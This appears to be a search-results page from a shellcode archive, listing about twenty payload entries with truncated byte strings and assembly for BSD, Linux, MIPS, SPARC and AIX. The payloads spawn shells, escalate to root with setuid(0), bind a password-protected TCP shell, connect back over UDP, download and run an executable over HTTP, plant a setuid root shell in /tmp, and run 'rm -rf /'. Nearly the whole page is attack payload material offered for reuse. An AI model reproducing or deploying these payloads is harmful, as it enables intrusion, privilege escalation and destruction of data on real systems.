1135 matches found
BSD/x86 - execve(/bin/sh) & setuid(0) - 29 bytes
No description provided by source. / BSD version FreeBSD, OpenBSD, NetBSD. [email protected] 29 bytes. -setuid0; -execve/bin/sh; / char shellcode= "\x31\xc0" // xor %eax,%eax "\x50" // push %eax "\xb0\x17" // mov $0x17,%al "\x50" // push %eax "\xcd\x80" // int $0x80 "\x50" // push %eax...
Linux/x86 - HTTP/1.x GET, Downloads & execve()
No description provided by source. / linux/x86 - HTTP/1.x GET, Downloads and execve - 111 bytes+ This shellcode allows you to download a ELF executable straight off a standard HTTP server and launch it. It will saved locally it into a filename called 'A' in the current directory. CONFIGURATION Th...
Linux/sparc - [setreuid(0,0); execve() of /bin/sh] - 64 bytes
No description provided by source. / Linux/SPARC setreuid0,0; execve of /bin/sh shellcode. / char c0de = / anathema [email protected] / / setreuid0,0; / "\x82\x10\x20\x7e" / mov 126, %g1 / "\x92\x22\x40\x09" / sub %o1, %o1, %o1 / "\x90\x0a\x40\x09" / and %o1, %o1, %o0 / "\x91\xd0\x20\x10" / ta...
Linux/x86 - execve(/bin/sh) - 24 bytes
No description provided by source. / [email protected] execve/bin/sh. 24 bytes. es lo mas chica que se puede hacer. / char shellcode= "\x31\xc0" // xorl %eax,%eax "\x50" // pushl %eax "\x68\x6e\x2f\x73\x68" // pushl $0x68732f6e "\x68\x2f\x2f\x62\x69" // pushl $0x69622f2f "\x89\xe3" // mov...
Linux/x86 - Connect-Back port UDP/54321 - 151 bytes
No description provided by source. / linux/x86 connect-back port UDP/54321 & dup2 & fork & execve /usr/bin/tcpdump -iany -w- "port ! 54321" 151 bytes by XenoMuta | |/ / / |/ / / / | / / / / /|/ / / / / / / / / / / / / // / / / / // / // // / //|// //// //,//,/ xenomuta arroba phreaker punto...
Linux/x86 - execve(/bin/sh) - 16 bytes
No description provided by source. / $Id: reusage-linux.c,v 1.3 2004/01/30 20:08:46 raptor Exp $ reusage-linux.c - re-use of "/bin/sh" string in .rodata Copyright c 2003 Marco Ivaldi [email protected] Short local shellcode for /bin/sh execve. It re-uses the "/bin/sh" string stored in the...
Linux/sparc - setreuid(0,0)&standard execve(). 72 bytes
No description provided by source. / Linux/SPARC setreuid0, 0; necessary, /bin/sh drops privs, standard execve. / char c0de = / by michel kaempf / / setuid 0 ; / "\x90\x1a\x40\x09\x82\x10\x20\x17\x91\xd0\x20\x10" / setgid 0 ; / "\x90\x1a\x40\x09\x82\x10\x20\x2e\x91\xd0\x20\x10" / Aleph One : /...
Linux/x86-64bits - execve("/bin/sh", ["/bin/sh"], NULL) - 33 bytes
No description provided by source. Linux/X86-64 Dummy for shellcode: execve"/bin/sh", "/bin/sh", NULL hophet at gmail.com .text .globl start start: xorq %rdx, %rdx movq $0x68732f6e69622fff,%rbx shr $0x8, %rbx push %rbx movq %rsp,%rdi xorq %rax,%rax pushq %rax pushq %rdi movq %rsp,%rsi mov $0x3b,%...
Linux/x86 - setuid(0) & execve(/bin/sh,0,0) - 28 bytes
No description provided by source. -------------------ASM---------------------- global start section .text start: ;setuid0 xor ebx,ebx lea eax,ebx+17h cdq int 80h ;execve"/bin/sh",0,0 xor ecx,ecx push ecx push 0x68732f6e push 0x69622f2f lea eax,ecx+0Bh mov ebx,esp int 80h...
Linux/mips - execve(/bin/sh) - 56 bytes
No description provided by source. / 56 bytes execve /bin/sh shellcode - linux-mipsel - by core [email protected] Note: For MIPS running in little-endian mode. Tested on a Cobalt Qube2 server running Linux 2.4.18 Greetz to bighawk... i couldn't get his execve to work for some reason :/ / char code ...
Linux/mips - execve("/bin/sh",["/bin/sh"],[]); - 60 bytes
No description provided by source. / - MIPS little-endian - linux execve 60 bytes shellcode - execve"/bin/sh","/bin/sh",; - tested on Linksys WRT54G/GL DD-WRT Linux - based on scut paper Writing MIPS/Irix shellcode vaicebine at gmail dot com / include "stdio.h" char shellcode = "\x50\x73\x06\x24"...
Linux/x86 - setuid(0) && execve() - 25 bytes
No description provided by source. Hi, i've shrinked down the shellcode to 25 bytes, the smallest setuid & execve GNU/Linux shellcode without nulls that spawns a shell. -------------------------------------------------------------------------------------- SMALLEST SETUID & EXECVE GNU/LINUX x86...
Linux/x86 - execve("/bin//sh/",["/bin//sh"],NULL)
No description provided by source. / revenge-execve.c, v1.0 2006/10/14 16:32 Yet another linux execve shellcode.. linux/x86 execve"/bin//sh/","/bin//sh",NULL shellcode http://www.0xcafebabe.it [email protected] But this time it's 22 bytes We could start the shellcode with a mov instead of pus...
Linux/x86 - execve("rm -rf /")
No description provided by source. / By Kris Katterjohn 11/18/2006 45 byte shellcode to execve"rm -rf /" for Linux/x86 section .text global start start: ; execve"/bin/rm", "/bin/rm", "-r", "-f", "/", NULL , NULL push byte 11 pop eax cdq push edx push byte 0x2f mov edi, esp push edx push word 0x66...
Linux/mips - port bind 4919 - 276 bytes
No description provided by source. / - MIPS little-endian - linux port listener 276 bytes shellcode - execve"/bin/sh","/bin/sh",; - port 0x1337 4919 - tested on Linksys WRT54G/GL DD-WRT Linux - based on scut paper Writing MIPS/Irix shellcode vaicebine at gmail dot com / include "stdio.h" char...
Aix - execve /bin/sh - 88 bytes
No description provided by source. / Aix execve of /bin/sh Georgi Guninski [email protected] / unsigned int code= 0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 , 0x60632c48 , 0x90610440 , 0x3c60d002 , 0x60634c0c , 0x90610444 , 0x3c602f62 , 0x6063696e , 0x90610438 , 0x3c602f73 , 0x60636801 ...
FreeBSD/x86-64 - Bind TCP Shell (/bin/sh) + Password (R2CBw0cr) Shellcode (127 bytes)
FreeBSD/x86-64 - Bind TCP Shell /bin/sh + Password R2CBw0cr Shellcode 127 bytes. Shellcode exploit for FreeBSDx86-64 platform / Gitsnik, @dracyrys FreeBSD x8664 bindtcp with passcode, 127 bytes Passcode: R2CBw0cr / C Source: char code = \ "\x6a\x61\x58\x6a\x02\x5f\x6a\x01\x5e\x99"...
Linux/x86 - execve(/bin/dash) Shellcode (49 bytes)
Linux/x86 - execve/bin/dash Shellcode 49 bytes. Shellcode exploit for Linuxx86 platform / Shellcode length: 49 Author: Chroniccommand /bin/dash My first attempt at shellcode Poison security / include //49 bytes char shellcode = "\xeb\x18\x5e\x31\xc0\x88\x46\x09\x89\x76\x0a"...
Linux/x86 - fork() + setreuid(0, 0) + execve(cp /bin/sh /tmp/sh; chmod 4755 /tmp/sh) Shellcode (126 bytes)
Linux/x86 - fork + setreuid0, 0 + execvecp /bin/sh /tmp/sh; chmod 4755 /tmp/sh Shellcode 126 bytes. Shellcode exploit for Linuxx86 platform / linux/x86 shamelessly ripped from one of my unpublished exploits / / fork's, does setreuid0, 0; then execve's: /bin/sh -c "cp /bin/sh /tmp/sh; chmod 4755...
BSD/x86 - execve(/bin/sh) Shellcode (28 bytes)
BSD/x86 - execve/bin/sh Shellcode 28 bytes. Shellcode exploit for BSDx86 platform / simply execvebinsh shellcode in 28 bytes written on nasm - my first nasm exp. greetz2: mig darknet /EFnet.org dev0id rus-sec /EFnet.org rootteam.void.ru / char shellcode =...